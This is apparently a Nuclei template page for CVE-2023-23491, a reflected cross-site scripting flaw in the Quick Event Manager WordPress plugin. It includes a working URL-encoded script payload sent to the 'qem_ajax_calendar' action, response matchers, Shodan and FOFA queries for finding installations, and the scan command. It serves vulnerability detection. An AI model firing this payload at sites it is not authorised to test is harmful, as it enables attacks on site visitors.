Skip to content
Nuclei Templates

Quick Event Manager < 9.7.5 - Cross-Site Scripting

ID: CVE-2023-23491

Severity: medium

Author: ritikchaddha

Tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins

Description

Section titled “Description”

The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the ‘category’ parameter of its ‘qem_ajax_calendar’ action.

YAML Source

Section titled “YAML Source”
id: CVE-2023-23491


info:
  name: Quick Event Manager < 9.7.5 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.
  remediation: Fixed in version 9.7.5 and above
  reference:
    - https://wpscan.com/vulnerability/49178a9d-0500-4e3e-8ea1-6cd4eeda2a4e
    - https://nvd.nist.gov/vuln/detail/CVE-2023-23491
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/JoshuaMart/JoshuaMart
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-23491
    cwe-id: CWE-79
    epss-score: 0.0012
    epss-percentile: 0.46205
    cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fullworksplugins
    product: quick_event_manager
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/quick-event-manager
    fofa-query: body=/wp-content/plugins/quick-event-manager
    publicwww-query: "/wp-content/plugins/quick-event-manager"
  tags: cve2023,cve,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager,fullworksplugins


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"


    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains(body, "<script>alert(document.domain)</script>")'
          - 'contains(body, "qem_calendar")'
        condition: and
# digest: 4a0a00473045022100f5eb94c3cb237179eff9708e1fb3b1339b922ffff9062d6aa3ccd149264e26f3022012810c50e8658cc94413bb96d082e80da754586fe1aed773565e27d4972060f7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-23491.yaml"

View on Github